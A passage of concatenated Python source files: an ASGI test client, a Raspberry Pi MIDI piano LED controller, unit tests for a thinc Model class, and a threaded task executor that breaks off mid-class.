headers, "client": ["testclient", 50000], "server": [host, port], "extensions": {"http.response.template": {}}, } request_complete = False response_started = False response_complete = False raw_kwargs = {"body": io.BytesIO()} # type: typing.Dict[str, typing.Any] template = None context = None async def receive() -> Message: nonlocal request_complete, response_complete if request_complete: while not response_complete: await asyncio.sleep(0.0001) return {"type": "http.disconnect"} body = request.body if isinstance(body, str): body_bytes = body.encode("utf-8") # type: bytes elif body is None: body_bytes = b"" elif isinstance(body, types.GeneratorType): try: chunk = body.send(None) if isinstance(chunk, str): chunk = chunk.encode("utf-8") return {"type": "http.request", "body": chunk, "more_body": True} except StopIteration: request_complete = True return {"type": "http.request", "body": b""} else: body_bytes = body request_complete = True return {"type": "http.request", "body": body_bytes} async def send(message: Message) -> None: nonlocal raw_kwargs, response_started, response_complete, template, context if message["type"] == "http.response.start": assert ( not response_started ), 'Received multiple "http.response.start" messages.' raw_kwargs["version"] = 11 raw_kwargs["status"] = message["status"] raw_kwargs["reason"] = _get_reason_phrase(message["status"]) raw_kwargs["headers"] = [ (key.decode(), value.decode()) for key, value in message["headers"] ] raw_kwargs["preload_content"] = False raw_kwargs["original_response"] = _MockOriginalResponse( raw_kwargs["headers"] ) response_started = True elif message["type"] == "http.response.body": assert ( response_started ), 'Received "http.response.body" without "http.response.start".' assert ( not response_complete ), 'Received "http.response.body" after response completed.' body = message.get("body", b"") more_body = message.get("more_body", False) if request.method != "HEAD": raw_kwargs["body"].write(body) if not more_body: raw_kwargs["body"].seek(0) response_complete = True elif message["type"] == "http.response.template": template = message["template"] context = message["context"] try: loop = asyncio.get_event_loop() except RuntimeError: loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) try: loop.run_until_complete(self.app(scope, receive, send)) except BaseException as exc: if self.raise_server_exceptions: raise exc if self.raise_server_exceptions: assert response_started, "TestClient did not receive any response." elif not response_started: raw_kwargs = { "version": 11, "status": 500, "reason": "Internal Server Error", "headers": [], "preload_content": False, "original_response": _MockOriginalResponse([]), "body": io.BytesIO(), } raw = requests.packages.urllib3.HTTPResponse(**raw_kwargs) response = self.build_response(request, raw) if template is not None: response.template = template response.context = context return response class WebSocketTestSession: def __init__(self, app: ASGI3App, scope: Scope) -> None: self.app = app self.scope = scope self.accepted_subprotocol = None self._receive_queue = queue.Queue() # type: queue.Queue self._send_queue = queue.Queue() # type: queue.Queue self._thread = threading.Thread(target=self._run) self.send({"type": "websocket.connect"}) self._thread.start() message = self.receive() self._raise_on_close(message) self.accepted_subprotocol = message.get("subprotocol", None) def __enter__(self) -> "WebSocketTestSession": return self def __exit__(self, *args: typing.Any) -> None: self.close(1000) self._thread.join() while not self._send_queue.empty(): message = self._send_queue.get() if isinstance(message, BaseException): raise message def _run(self) -> None: """ The sub-thread in which the websocket session runs. """ loop = asyncio.new_event_loop() scope = self.scope receive = self._asgi_receive send = self._asgi_send try: loop.run_until_complete(self.app(scope, receive, send)) except BaseException as exc: self._send_queue.put(exc) finally: loop.close() async def _asgi_receive(self) -> Message: while self._receive_queue.empty(): await asyncio.sleep(0) return self._receive_queue.get() async def _asgi_send(self, message: Message) -> None: self._send_queue.put(message) def _raise_on_close(self, message: Message) -> None: if message["type"] == "websocket.close": raise WebSocketDisconnect(message.get("code", 1000)) def send(self, message: Message) -> None: self._receive_queue.put(message) def send_text(self, data: str) -> None: self.send({"type": "websocket.receive", "text": data}) def send_bytes(self, data: bytes) -> None: self.send({"type": "websocket.receive", "bytes": data}) def send_json(self, data: typing.Any, mode: str = "text") -> None: assert mode in ["text", "binary"] text = json.dumps(data) if mode == "text": self.send({"type": "websocket.receive", "text": text}) else: self.send({"type": "websocket.receive", "bytes": text.encode("utf-8")}) def close(self, code: int = 1000) -> None: self.send({"type": "websocket.disconnect", "code": code}) def receive(self) -> Message: message = self._send_queue.get() if isinstance(message, BaseException): raise message return message def receive_text(self) -> str: message = self.receive() self._raise_on_close(message) return message["text"] def receive_bytes(self) -> bytes: message = self.receive() self._raise_on_close(message) return message["bytes"] def receive_json(self, mode: str = "text") -> typing.Any: assert mode in ["text", "binary"] message = self.receive() self._raise_on_close(message) if mode == "text": text = message["text"] else: text = message["bytes"].decode("utf-8") return json.loads(text) class TestClient(requests.Session): __test__ = False # For pytest to not discover this up. def __init__( self, app: typing.Union[ASGI2App, ASGI3App], base_url: str = "http://testserver", raise_server_exceptions: bool = True, root_path: str = "", ) -> None: super(TestClient, self).__init__() if _is_asgi3(app): app = typing.cast(ASGI3App, app) asgi_app = app else: app = typing.cast(ASGI2App, app) asgi_app = _WrapASGI2(app) #  type: ignore adapter = _ASGIAdapter( asgi_app, raise_server_exceptions=raise_server_exceptions, root_path=root_path, ) self.mount("http://", adapter) self.mount("https://", adapter) self.mount("ws://", adapter) self.mount("wss://", adapter) self.headers.update({"user-agent": "testclient"}) self.app = asgi_app self.base_url = base_url def request( # type: ignore self, method: str, url: str, params: Params = None, data: DataType = None, headers: typing.MutableMapping[str, str] = None, cookies: Cookies = None, files: FileType = None, auth: AuthType = None, timeout: TimeOut = None, allow_redirects: bool = None, proxies: typing.MutableMapping[str, str] = None, hooks: typing.Any = None, stream: bool = None, verify: typing.Union[bool, str] = None, cert: typing.Union[str, typing.Tuple[str, str]] = None, json: typing.Any = None, ) -> requests.Response: url = urljoin(self.base_url, url) return super().request( method, url, params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allow_redirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert, json=json, ) def websocket_connect( self, url: str, subprotocols: typing.Sequence[str] = None, **kwargs: typing.Any ) -> typing.Any: url = urljoin("ws://testserver", url) headers = kwargs.get("headers", {}) headers.setdefault("connection", "upgrade") headers.setdefault("sec-websocket-key", "testserver==") headers.setdefault("sec-websocket-version", "13") if subprotocols is not None: headers.setdefault("sec-websocket-protocol", ", ".join(subprotocols)) kwargs["headers"] = headers try: super().request("GET", url, **kwargs) except _Upgrade as exc: session = exc.session else: raise RuntimeError("Expected WebSocket upgrade") # pragma: no cover return session def __enter__(self) -> "TestClient": loop = asyncio.get_event_loop() self.send_queue = asyncio.Queue() # type: asyncio.Queue self.receive_queue = asyncio.Queue() # type: asyncio.Queue self.task = loop.create_task(self.lifespan()) loop.run_until_complete(self.wait_startup()) return self def __exit__(self, *args: typing.Any) -> None: loop = asyncio.get_event_loop() loop.run_until_complete(self.wait_shutdown()) async def lifespan(self) -> None: scope = {"type": "lifespan"} try: await self.app(scope, self.receive_queue.get, self.send_queue.put) finally: await self.send_queue.put(None) async def wait_startup(self) -> None: await self.receive_queue.put({"type": "lifespan.startup"}) message = await self.send_queue.get() if message is None: self.task.result() assert message["type"] in ( "lifespan.startup.complete", "lifespan.startup.failed", ) if message["type"] == "lifespan.startup.failed": message = await self.send_queue.get() if message is None: self.task.result() async def wait_shutdown(self) -> None: await self.receive_queue.put({"type": "lifespan.shutdown"}) message = await self.send_queue.get() if message is None: self.task.result() assert message["type"] == "lifespan.shutdown.complete" await self.task
functions.py
import threading from neopixel import * import mido import datetime import psutil import time import socket import RPi.GPIO as GPIO def get_ip_address(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) local_ip = s.getsockname()[0] s.close() return local_ip def find_between(s, start, end): try: return (s.split(start))[1].split(end)[0] except: return False def clamp(val, val_min, val_max): return max(val_min, min(val, val_max)) def shift(l, n): return l[n:] + l[:n] def play_midi(song_path, midiports, saving, menu, ledsettings, ledstrip): #commented parts are for benchmarking midiports.pending_queue.append(mido.Message('note_on')) if song_path in saving.is_playing_midi.keys(): menu.render_message(song_path, "Already playing", 2000) return saving.is_playing_midi.clear() saving.is_playing_midi[song_path] = True menu.render_message("Playing: ", song_path, 2000) saving.t = threading.currentThread() try: mid = mido.MidiFile("Songs/" + song_path) fastColorWipe(ledstrip.strip, True, ledsettings) #length = mid.length t0 = False total_delay = 0 # notes_count = 0 delay = 0 # message_to_print = '' for message in mid: if song_path in saving.is_playing_midi.keys(): if not t0: t0 = time.time() # if(notes_count >= 100): # notes_count = 0 # print(repr(message_to_print)) # message_to_print = '' # notes_count += 1 total_delay += message.time current_time = (time.time() - t0) + message.time drift = total_delay - current_time if (drift < 0): delay = message.time + drift else: delay = message.time if(delay < 0): delay = 0 #message_to_print += "\n Message: "+str(message)+" Total delay: "+str(total_delay)+" current_time: "+str(current_time)+' message time: ' + str(message.time) + ' actual delay: ' + str( #delay) + ' drift: ' + str(drift) if delay > 0: time.sleep(delay) if not message.is_meta: midiports.playport.send(message) midiports.pending_queue.append(message.copy(time=0)) else: break print('play time: {:.2f} s (expected {:.2f})'.format(time.time() - t0, total_delay)) #print('play time: {:.2f} s (expected {:.2f})'.format(time.time() - t0, length)) # saving.is_playing_midi = False except: menu.render_message(song_path, "Can't play this file", 2000) saving.is_playing_midi.clear() def screensaver(menu, midiports, saving, ledstrip): KEY2 = 20 GPIO.setup(KEY2, GPIO.IN, GPIO.PUD_UP) delay = 0.1 interval = 3 / float(delay) i = 0 cpu_history = [None] * int(interval) cpu_chart = [0] * 28 cpu_average = 0 upload = 0 download = 0 upload_start = 0 download_start = 0 local_ip = 0 if menu.screensaver_settings["local_ip"] == "1": local_ip = get_ip_address() try: midiports.inport.poll() except: pass while True: if (time.time() - saving.start_time) > 3600 and delay < 0.5 and menu.screensaver_is_running == False: delay = 0.9 interval = 5 / float(delay) cpu_history = [None] * int(interval) cpu_average = 0 i = 0 if int(menu.screen_off_delay) > 0 and ((time.time() - saving.start_time) > (int(menu.screen_off_delay) * 60)): menu.screen_status = 0 GPIO.output(24, 0) if int(menu.led_animation_delay) > 0 and ((time.time() - saving.start_time) > ( int(menu.led_animation_delay) * 60)) and menu.screensaver_is_running == False: menu.screensaver_is_running = True if menu.led_animation == "Theater Chase": menu.t = threading.Thread(target=theaterChase, args=(ledstrip.strip, 1)) menu.t.start() if menu.led_animation == "Breathing Slow": menu.t = threading.Thread(target=breathing, args=(ledstrip.strip, 25)) menu.t.start() if menu.led_animation == "Rainbow Slow": menu.t = threading.Thread(target=rainbow, args=(ledstrip.strip, 10)) menu.t.start() if menu.led_animation == "Rainbow Cycle Slow": menu.t = threading.Thread(target=rainbowCycle, args=(ledstrip.strip, 10)) menu.t.start() if menu.led_animation == "Theater Chase Rainbow": menu.t = threading.Thread(target=theaterChaseRainbow, args=(ledstrip.strip, 5)) menu.t.start() if menu.led_animation == "Sound of da police": menu.t = threading.Thread(target=sound_of_da_police, args=(ledstrip.strip, 1)) menu.t.start() if menu.led_animation == "Scanner": menu.t = threading.Thread(target=scanner, args=(ledstrip.strip, 1)) menu.t.start() hour = datetime.datetime.now().strftime("%H:%M:%S") date = datetime.datetime.now().strftime("%d-%m-%Y") cpu_usage = psutil.cpu_percent() cpu_history[i] = cpu_usage cpu_chart.append(cpu_chart.pop(0)) cpu_chart[27] = cpu_usage if i >= (int(interval) - 1): i = 0 try: cpu_average = sum(cpu_history) / (float(len(cpu_history) + 1)) last_cpu_average = cpu_average except: cpu_average = last_cpu_average if menu.screensaver_settings["ram"] == "1": ram_usage = psutil.virtual_memory()[2] else: ram_usage = 0 if menu.screensaver_settings["temp"] == "1": try: temp = find_between(str(psutil.sensors_temperatures()["cpu_thermal"]), "current=", ",") except: temp = find_between(str(psutil.sensors_temperatures()["cpu-thermal"]), "current=", ",") temp = round(float(temp), 1) else: temp = 0 if menu.screensaver_settings["network_usage"] == "1": upload_end = psutil.net_io_counters().bytes_sent download_end = psutil.net_io_counters().bytes_recv if upload_start: upload = upload_end - upload_start upload = upload * (1 / delay) upload = upload / 1000000 upload = round(upload, 2) if download_start: download = download_end - download_start download = download * (1 / delay) download = download / 1000000 download = round(download, 2) upload_start = upload_end download_start = download_end else: upload = 0 download = 0 if menu.screensaver_settings["sd_card_space"] == "1": card_space = psutil.disk_usage('/') else: card_space = 0 menu.render_screensaver(hour, date, cpu_usage, round(cpu_average, 1), ram_usage, temp, cpu_chart, upload, download, card_space, local_ip) time.sleep(delay) i += 1 try: if str(midiports.inport.poll()) != "None": menu.screensaver_is_running = False saving.start_time = time.time() menu.screen_status = 1 GPIO.output(24, 1) menu.show() midiports.reconnect_ports() midiports.last_activity = time.time() break except: pass if GPIO.input(KEY2) == 0: menu.screensaver_is_running = False saving.start_time = time.time() menu.screen_status = 1 GPIO.output(24, 1) menu.show() midiports.reconnect_ports() break # Get note position on the strip def get_note_position(note, ledstrip): if note > 92: note_offset = 2 elif note > 55: note_offset = 1 else: note_offset = 0 note_offset -= ledstrip.shift note_pos_raw = (note - 20) - note_offset if ledstrip.reverse: return max(0, ledstrip.led_number - note_pos_raw) else: return max(0, note_pos_raw) # scale: 1 means in C, scale: 2 means in C#, scale: 3 means in D, etc... def get_scale_color(scale, note_position, ledsettings): notes_in_scale = [0, 2, 4, 5, 7, 9, 11] scale = int(scale) note_position = (note_position - scale) % 12 if note_position in notes_in_scale: return list(ledsettings.key_in_scale.values()) else: return list(ledsettings.key_not_in_scale.values()) def get_rainbow_colors(pos, color): pos = int(pos) if pos < 85: if color == "green": return pos * 3 elif color == "red": return 255 - pos * 3 elif color == "blue": return 0 elif pos < 170: pos -= 85 if color == "green": return 255 - pos * 3 elif color == "red": return 0 elif color == "blue": return pos * 3 else: pos -= 170 if color == "green": return 0 elif color == "red": return pos * 3 elif color == "blue": return 255 - pos * 3 # LED animations def fastColorWipe(strip, update, ledsettings): brightness = ledsettings.backlight_brightness_percent / 100 red = int(ledsettings.get_backlight_color("Red") * brightness) green = int(ledsettings.get_backlight_color("Green") * brightness) blue = int(ledsettings.get_backlight_color("Blue") * brightness) color = Color(green, red, blue) for i in range(strip.numPixels()): strip.setPixelColor(i, color) if update: strip.show() def theaterChase(strip, color, ledsettings, menu, wait_ms=25): """Movie theater light style chaser animation.""" menu.screensaver_is_running = False time.sleep(0.5) if menu.screensaver_is_running: return menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: red = int(ledsettings.get_color("Red")) green = int(ledsettings.get_color("Green")) blue = int(ledsettings.get_color("Blue")) for q in range(5): for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, Color(green, red, blue)) strip.show() time.sleep(wait_ms / 1000.0) for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, 0) j += 1 if j > 256: j = 0 menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def wheel(pos): """Generate rainbow colors across 0-255 positions.""" if pos < 85: return Color(pos * 3, 255 - pos * 3, 0) elif pos < 170: pos -= 85 return Color(255 - pos * 3, 0, pos * 3) else: pos -= 170 return Color(0, pos * 3, 255 - pos * 3) def rainbow(strip, ledsettings, menu, wait_ms=20): """Draw rainbow that fades across all pixels at once.""" menu.screensaver_is_running = False time.sleep(0.2) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: for i in range(strip.numPixels()): strip.setPixelColor(i, wheel(j & 255)) j += 1 if j >= 256: j = 0 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def rainbowCycle(strip, ledsettings, menu, wait_ms=20): """Draw rainbow that uniformly distributes itself across all pixels.""" menu.screensaver_is_running = False time.sleep(0.2) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: for i in range(strip.numPixels()): strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255)) j += 1 if j >= 256: j = 0 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def theaterChaseRainbow(strip, ledsettings, menu, wait_ms=25): """Rainbow movie theater light style chaser animation.""" menu.screensaver_is_running = False time.sleep(0.5) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: for q in range(5): for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, wheel((i + j) % 255)) strip.show() time.sleep(wait_ms / 1000.0) for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, 0) j += 1 if j > 256: j = 0 menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def breathing(strip, ledsettings, menu, wait_ms=2): menu.screensaver_is_running = False time.sleep(0.1) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() menu.screensaver_is_running = True multiplier = 24 direction = 2 while menu.screensaver_is_running: if multiplier >= 98 or multiplier < 24: direction *= -1 multiplier += direction divide = multiplier / float(100) red = int(round(float(ledsettings.get_color("Red")) * float(divide))) green = int(round(float(ledsettings.get_color("Green")) * float(divide))) blue = int(round(float(ledsettings.get_color("Blue")) * float(divide))) for i in range(strip.numPixels()): strip.setPixelColor(i, Color(green, red, blue)) strip.show() if wait_ms > 0: time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def sound_of_da_police(strip, ledsettings, menu, wait_ms=5): menu.screensaver_is_running = False time.sleep(0.1) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() menu.screensaver_is_running = True middle = strip.numPixels() / 2 r_start = 0 l_start = 196 while menu.screensaver_is_running: r_start += 14 l_start -= 14 for i in range(strip.numPixels()): if (i > middle) and i > r_start and i < (r_start + 40): strip.setPixelColor(i, Color(0, 255, 0)) elif (i < middle) and i < l_start and i > (l_start - 40): strip.setPixelColor(i, Color(0, 0, 255)) else: strip.setPixelColor(i, Color(0, 0, 0)) if r_start > 150: r_start = 0 l_start = 175 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def scanner(strip, ledsettings, menu, wait_ms=1): menu.screensaver_is_running = False time.sleep(0.1) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() menu.screensaver_is_running = True position = 0 direction = 3 scanner_length = 20 red_fixed = ledsettings.get_color("Red") green_fixed = ledsettings.get_color("Green") blue_fixed = ledsettings.get_color("Blue") while menu.screensaver_is_running: position += direction for i in range(strip.numPixels()): if i > (position - scanner_length) and i < (position + scanner_length): distance_from_position = position - i if distance_from_position < 0: distance_from_position *= -1 divide = ((scanner_length / 2) - distance_from_position) / float(scanner_length / 2) red = int(float(red_fixed) * float(divide)) green = int(float(green_fixed) * float(divide)) blue = int(float(blue_fixed) * float(divide)) if divide > 0: strip.setPixelColor(i, Color(green, red, blue)) else: strip.setPixelColor(i, Color(0, 0, 0)) if position >= strip.numPixels() or position <= 1: direction *= -1 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings)
test_model.py
# encoding: utf8 from __future__ import unicode_literals import tempfile import os import pytest import threading import time from thinc.neural._classes import model as base from thinc.neural.ops import NumpyOps @pytest.fixture def model_with_no_args(): model = base.Model() return model def test_Model_defaults_to_name_model(model_with_no_args): assert model_with_no_args.name == "model" def test_changing_instance_name_doesnt_change_class_name(): model = base.Model() assert model.name != "changed" model.name = "changed" model2 = base.Model() assert model2.name != "changed" def test_changing_class_name_doesnt_change_default_instance_name(): model = base.Model() assert model.name != "changed" base.Model.name = "changed" assert model.name != "changed" # Reset state base.Model.name = "model" def test_changing_class_name_doesnt_changes_nondefault_instance_name(): model = base.Model(name="nondefault") assert model.name == "nondefault" base.Model.name = "changed" assert model.name == "nondefault" def test_Model_defaults_to_cpu(model_with_no_args): assert isinstance(model_with_no_args.ops, NumpyOps) def test_models_get_different_ids(model_with_no_args): model1 = base.Model() model2 = base.Model() assert model1.id != model2.id def test_init_assigns_attributes(): model = base.Model() model._mem assert model._layers == [] def test_init_installs_via_descriptions(): def mock_install(attr, self): setattr(self, attr, "model=" + self.name) base.Model.descriptions = [("myattr", mock_install)] model = base.Model(name="model1") assert model.myattr == "model=%s" % "model1" model2 = base.Model(name="model2") assert model2.myattr == "model=%s" % "model2" def test_init_calls_hooks(): def mock_init_hook(self, *args, **kwargs): setattr(self, "hooked", (args, kwargs)) base.Model.on_init_hooks = [mock_init_hook] model = base.Model(0, 1, 2) assert model.hooked == ((0, 1, 2), {}) model2 = base.Model(value="something") assert model2.hooked == (tuple(), {"value": "something"}) def test_use_device(): dev_id = id(base.Model.ops) with base.Model.use_device(base.Model.ops.device): assert id(base.Model.ops) == dev_id with base.Model.use_device("gpu"): assert id(base.Model.ops) != dev_id assert id(base.Model.ops) == dev_id def test_bind_plus(): with base.Model.define_operators({"+": lambda a, b: (a.name, b.name)}): m = base.Model(name="a") + base.Model(name="b") assert m == ("a", "b") def test_plus_chain(): with base.Model.define_operators({"+": lambda a, b: a}): m = ( base.Model(name="a") + base.Model(name="b") + base.Model(name="c") + base.Model(name="d") ) assert m.name == "a" def test_overload_operators_in_subthread(): """Test we can create a model in a child thread with overloaded operators.""" # Worker1 will start and run, while worker 2 sleeps after Model.define_operators. # Without thread-safety, worker2 will find that its operator definitions # have been removed, causing an error. worker1 = threading.Thread(target=_overload_plus, args=("+", 0)) worker2 = threading.Thread(target=_overload_plus, args=("*", 1,)) worker2.start() worker1.start() worker1.join() worker2.join() worker1 = threading.Thread(target=_overload_plus, args=("+", 1)) worker2 = threading.Thread(target=_overload_plus, args=("*", 0,)) worker2.start() worker1.start() worker1.join() worker2.join() def _overload_plus(operator, sleep): m1 = base.Model(name="a") m2 = base.Model(name="b") with base.Model.define_operators({operator: lambda a, b: a.name + b.name}): time.sleep(sleep) if operator == "+": value = m1 + m2 else: value = m1 * m2 assert value == "ab" assert base.Model._thread_local.operators == {} def test_nested_operator_contexts(): operator = "+" m1 = base.Model(name="a") m2 = base.Model(name="b") assert base.Model._thread_local.operators == {} with base.Model.define_operators({"+": lambda a, b: a.name + b.name}): value = m1 + m2 with pytest.raises(TypeError): value = m1 * m2 with base.Model.define_operators({"*": lambda a, b: a.name + b.name}): with pytest.raises(TypeError): value = m1 + m2 value = m1 * m2 with base.Model.define_operators({"-": lambda a, b: a.name + b.name}): with pytest.raises(TypeError): value = m1 + m2 value = m1 - m2 with pytest.raises(TypeError): value = m1 + m2 value = m1 * m2 value = m1 + m2 with pytest.raises(TypeError): value = m1 * m2 assert value == "ab" assert base.Model._thread_local.operators == {} @pytest.mark.parametrize("op", "+ - * @ / // % ** << >> & ^ |".split()) def test_all_operators(op): m1 = base.Model(name="a") m2 = base.Model(name="b") with base.Model.define_operators({op: lambda a, b: a.name + b.name}): if op == "+": value = m1 + m2 else: with pytest.raises(TypeError): value = m1 + m2 if op == "-": value = m1 - m2 else: with pytest.raises(TypeError): value = m1 - m2 if op == "*": value = m1 * m2 else: with pytest.raises(TypeError): value = m1 * m2 if op == "@": value = m1.__matmul__(m2) # Be kind to Python 2... else: with pytest.raises(TypeError): value = m1.__matmul__(m2) if op == "/": value = m1 / m2 else: with pytest.raises(TypeError): value = m1 / m2 if op == "//": value = m1 // m2 else: with pytest.raises(TypeError): value = m1 // m2 if op == "^": value = m1 ^ m2 else: with pytest.raises(TypeError): value = m1 ^ m2 if op == "%": value = m1 % m2 else: with pytest.raises(TypeError): value = m1 % m2 if op == "**": value = m1 ** m2 else: with pytest.raises(TypeError): value = m1 ** m2 if op == "<<": value = m1 << m2 else: with pytest.raises(TypeError): value = m1 << m2 if op == ">>": value = m1 >> m2 else: with pytest.raises(TypeError): value = m1 >> m2 if op == "&": value = m1 & m2 else: with pytest.raises(TypeError): value = m1 & m2 if op == "^": value = m1 ^ m2 else: with pytest.raises(TypeError): value = m1 ^ m2 if op == "|": value = m1 | m2 else: with pytest.raises(TypeError): value = m1 | m2 # noqa: F841 assert base.Model._thread_local.operators == {} def test_model_can_save_to_disk(model_with_no_args): temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model") model_with_no_args.to_disk(temp_file) def test_model_can_load_from_disk(model_with_no_args): temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model") model_with_no_args.to_disk(temp_file) m2 = model_with_no_args.from_disk(temp_file) assert model_with_no_args.to_bytes() == m2.to_bytes()
__init__.py
# MIT License # Copyright (c) 2020 Filip Kofron # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import threading, queue from typing import Callable, List from functools import partial # TODO: Offer tasks without continuations, continuations via the executor and allow functions without executor in argument. class Task: """ Represents a work schedulable in an executor. - A task can only be executed once, but it can create continuations as well as define dependencies. - A continuation as a task becomes a dependency of other tasks depending on the original task. - Any task created needs to be manually executed in an executor. Task execution provides the current executor as its parameter. """ def __init__(self, work: Callable[["Executor"], List["Task"]], dependencies: List["Task"] = []): self.lock = threading.Lock() self.work = work self.being_executed = False self.done = False self.scheduled_executor_callback = None self.continuations = [] self.dependencies = [] self.dependants : List[Task] = [] self.dependencies_done = 0 self.__add_dependencies(dependencies) def execute(self, executor: "Executor") -> None: """ Executes this task. Can only be done once and after all dependencies are satisfied. """ if self.done: raise Exception("Task already executed") if self.being_executed: raise Exception("Task is already being executed") self.being_executed = True if len(self.dependencies) != self.dependencies_done: raise Exception("Dependencies not satisfied") # Actual execution continuations = self.work(executor) # All dependants need to add continuations as their dependencies if len(continuations) > 0: with self.lock: self.continuations = continuations for dependant in self.dependants: dependant.__add_dependencies(self.continuations) # All is clear, we can signal that we are finished to all dependants with self.lock: for dependant in self.dependants: dependant.__notify_done(self) self.done = True # Task is officially done def on_schedule(self, callback: Callable[["Task"], None]) -> bool: """ Returns whether this task has satisfied dependencies to be executed. If not, callback to schedule it again during dependency satisfaction is stored. """ with self.lock: if self.scheduled_executor_callback != None: raise Exception("Task has already been scheduled once!") if self.done: raise Exception("Task already executed!") if len(self.dependencies) > self.dependencies_done: self.scheduled_executor_callback = callback return False return True def __add_dependencies(self, dependencies: List["Task"]) -> None: with self.lock: for dependency in dependencies: if dependency.__try_add_dependants([self]): self.dependencies.append(dependency) def __try_add_dependants(self, dependants: List["Task"]) -> bool: with self.lock: if self.done: return False self.dependants.extend(dependants) return True def __notify_done(self, dependency: "Task") -> None: with self.lock: self.dependencies_done += 1 if self.dependencies_done == len(self.dependencies): self.scheduled_executor_callback(self) self.scheduled_executor_callback = lambda task: None class Executor: """ A task queue and a thread pool for processing the queue. Offers a manual mode. """ def __init__(self, n_threads = -1, manual_execution = False): self.queue = queue.Queue() self.canceled = False self.joining = False self.manual_execution = manual_execution if n_threads == -1 and not self.manual_execution: n_threads = threading.active_count() elif n_threads <= 0 and not self.manual_execution: raise Exception(f"Incorrect number of threads: {n_threads}") if self.manual_execution and n_threads > 0: raise Exception("There should be no threads during manual execution") self.threads = [] for i in range(n_threads): thread = threading.Thread(target=self.__threadFunc) thread.start() self.threads.append(thread) def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.wait_until_tasks_done() self.join() def schedule_task(self, task: Task) -> None: """ Schedule task for execution now or later when its dependencies are satisfied. Can only be done once for the given task. """ if self.joining: raise Exception("No task can be scheduled during joining.") if task.on_schedule(self.__wake_callback): self.queue.put(task) def schedule_func(self, function, *args) -> Task: """ Schedules function as a task with no depencencies and returns the task. """ return self.schedule_func_with_deps(function, [], *args) def schedule_func_with_deps(self, function, dependencies: List[Task], *args) -> Task: """ Schedule task with given dependencies. Task will only be executed after all dependencies have been satisfied. Can only be done once for the given task. """ task = Task(partial(function, *args), dependencies) self.schedule_task(task) return task def make_task(self, function, *args): """ Returns a new unscheduled task from the function and given arguments. """ return self.make_task_with_deps(function, [], *args) def make_task_with_deps(self, function, dependencies: List[Task], *args): """ Returns a new unscheduled task from the function, dependencies and given arguments. """ return Task(partial(function, *args), dependencies) def __wake_callback(self, task: Task): self.queue.put(task) def __execute_single(self) -> bool: task_exception = None try: # TODO: configurable timeout timeout = 0.2 if self.manual_execution: timeout = 0 task = self.queue.get(timeout=timeout) try: task.execute(self) except Exception as e: task_exception = e self.queue.task_done() except: pass if task_exception: raise task_exception return self.queue.qsize() > 0 def __threadFunc(self): while not self.canceled: self.__execute_single() if self.joining and self.queue.qsize() == 0: break def manual_execute(self) -> bool: """ For executor in manual mode, execute a single task. Returns whether there are any remaining tasks in queue. Thread-safe. """ if not self.manual_execution: raise Exception("Executor not in manual mode!") return self.__execute_single() def join(self): """ Wait for all tasks to be done and causes all threads in the executor to finish and join. No task can be scheduled at this point.""" self.wait_until_tasks_done() self.joining = True for thread in self.threads: wake_task = Task(lambda executor: []) self.queue.put(wake_task) for thread in self.threads: thread.join() def wait_until_tasks_done(self): """ Blocks a thread until the queue is """ self.queue.join() def cancel(self): """ Stop processing new tasks (possibly leaving unfinished ones on the queue) and join all threads. """ self.canceled = True while self.queue.qsize() > 0: try: # TODO: configurable timeout timeout = 0.2 self.queue.get(timeout=timeout) self.queue.task_done() except: pass self.join() class Result: """ Represents a value, which can either have a set value or an exception to be raised upon retrieval of the value. """ def __init__(self): 